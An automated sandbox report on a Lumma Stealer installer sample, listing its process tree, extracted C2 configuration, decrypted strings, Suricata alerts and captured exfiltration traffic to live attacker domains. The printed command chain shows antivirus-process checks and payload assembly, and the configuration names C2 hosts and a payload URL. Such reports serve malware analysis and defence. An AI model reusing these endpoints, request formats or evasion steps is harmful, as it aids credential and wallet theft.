Edit tour

Windows Analysis Report
installer_1.05_37.4.exe

Overview

General Information

Sample name:	installer_1.05_37.4.exe
Analysis ID:	1589445
MD5:	a2e9824e77be1fbc29913ffd0b324823
SHA1:	42dd1e05ec49639d9d8ad318e732a66a1451fd6f
SHA256:	34c3a5d70230d93968cc2db047398cef644fb500740bbc20d09feb8e754ae197
Tags:	AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

installer_1.05_37.4.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\installer_1.05_37.4.exe" MD5: A2E9824E77BE1FBC29913FFD0B324823)

cmd.exe (PID: 7440 cmdline: "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7528 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7536 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7572 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7580 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7616 cmdline: cmd /c md 224553 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7632 cmdline: extrac32 /Y /E Choosing MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7648 cmdline: findstr /V "Readily" Departure MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7664 cmdline: cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7680 cmdline: cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Luther.com (PID: 7696 cmdline: Luther.com z MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 7712 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["kickykiduz.lat", "goldyhanders.cyou", "leggelatez.lat", "bloodyswif.lat", "washyceehsu.lat", "miniatureyu.lat", "shoefeatthe.lat", "savorraiykj.lat", "finickypwk.lat"], "Build id": "jMw1IE--psyche"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Luther.com PID: 7696	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Luther.com PID: 7696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Luther.com PID: 7696	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 10 entries

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7440, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7580, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T15:29:17.263917+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	104.21.16.1	443	TCP
2025-01-12T15:29:18.227891+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	104.21.16.1	443	TCP
2025-01-12T15:29:19.750416+0100	2028371	3	Unknown Traffic	192.168.2.5	49733	104.21.16.1	443	TCP
2025-01-12T15:29:20.991355+0100	2028371	3	Unknown Traffic	192.168.2.5	49744	104.21.16.1	443	TCP
2025-01-12T15:29:22.293507+0100	2028371	3	Unknown Traffic	192.168.2.5	49750	104.21.16.1	443	TCP
2025-01-12T15:29:23.841317+0100	2028371	3	Unknown Traffic	192.168.2.5	49761	104.21.16.1	443	TCP
2025-01-12T15:29:24.834074+0100	2028371	3	Unknown Traffic	192.168.2.5	49772	104.21.16.1	443	TCP
2025-01-12T15:29:25.839532+0100	2028371	3	Unknown Traffic	192.168.2.5	49777	104.21.16.1	443	TCP
2025-01-12T15:29:27.167828+0100	2028371	3	Unknown Traffic	192.168.2.5	49782	185.161.251.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T15:29:17.745513+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49716	104.21.16.1	443	TCP
2025-01-12T15:29:18.651191+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49722	104.21.16.1	443	TCP
2025-01-12T15:29:26.328028+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49777	104.21.16.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T15:29:17.745513+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49716	104.21.16.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T15:29:18.651191+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49722	104.21.16.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T15:29:20.352768+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49733	104.21.16.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/x	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt#	Avira URL Cloud: Label: malware
Source: https://cegu.shop/S	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt?	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtebKit/537.36	Avira URL Cloud: Label: malware
Source: https://goldyhanders.cyou/api	Avira URL Cloud: Label: malware
Source: https://cegu.shop:443/8574262446/ph.txtoft	Avira URL Cloud: Label: malware
Source: https://goldyhanders.cyou:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["kickykiduz.lat", "goldyhanders.cyou", "leggelatez.lat", "bloodyswif.lat", "washyceehsu.lat", "miniatureyu.lat", "shoefeatthe.lat", "savorraiykj.lat", "finickypwk.lat"], "Build id": "jMw1IE--psyche"}

Multi AV Scanner detection for submitted file

Source: installer_1.05_37.4.exe	Virustotal: Detection: 13%			Perma Link
Source: installer_1.05_37.4.exe	ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.7% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: finickypwk.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: savorraiykj.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: kickykiduz.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: miniatureyu.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: leggelatez.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: washyceehsu.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: bloodyswif.lat
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: goldyhanders.cyou
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jMw1IE--psyche

Source: installer_1.05_37.4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49782 version: TLS 1.2

Source: installer_1.05_37.4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00E9DC54
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EAA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00EAA087
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EAA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00EAA1E2
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	13_2_00E9E472
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EAA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_00EAA570
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA66DC FindFirstFileW,FindNextFileW,FindClose,	13_2_00EA66DC
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E6C622 FindFirstFileExW,	13_2_00E6C622
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	13_2_00EA73D4
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA7333 FindFirstFileW,FindClose,	13_2_00EA7333
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00E9D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\224553	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\224553\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49716 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49733 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49722 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49777 -> 104.21.16.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: kickykiduz.lat
Source: Malware configuration extractor	URLs: goldyhanders.cyou
Source: Malware configuration extractor	URLs: leggelatez.lat
Source: Malware configuration extractor	URLs: bloodyswif.lat
Source: Malware configuration extractor	URLs: washyceehsu.lat
Source: Malware configuration extractor	URLs: miniatureyu.lat
Source: Malware configuration extractor	URLs: shoefeatthe.lat
Source: Malware configuration extractor	URLs: savorraiykj.lat
Source: Malware configuration extractor	URLs: finickypwk.lat

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49772 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49777 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49761 -> 104.21.16.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=87R2HP2T24FSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12800Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L6787UKPDE0UG5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15054Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U1G1WYDNMWQDLVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20544Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SNQRJQPDJYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1337Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AQP4E5FX5O04User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1081Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: goldyhanders.cyou
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EAD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

13_2_00EAD889

Source: global traffic

HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfO
Source: global traffic	DNS traffic detected: DNS query: goldyhanders.cyou
Source: global traffic	DNS traffic detected: DNS query: cegu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: goldyhanders.cyou

Source: installer_1.05_37.4.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: installer_1.05_37.4.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: installer_1.05_37.4.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: installer_1.05_37.4.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: installer_1.05_37.4.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
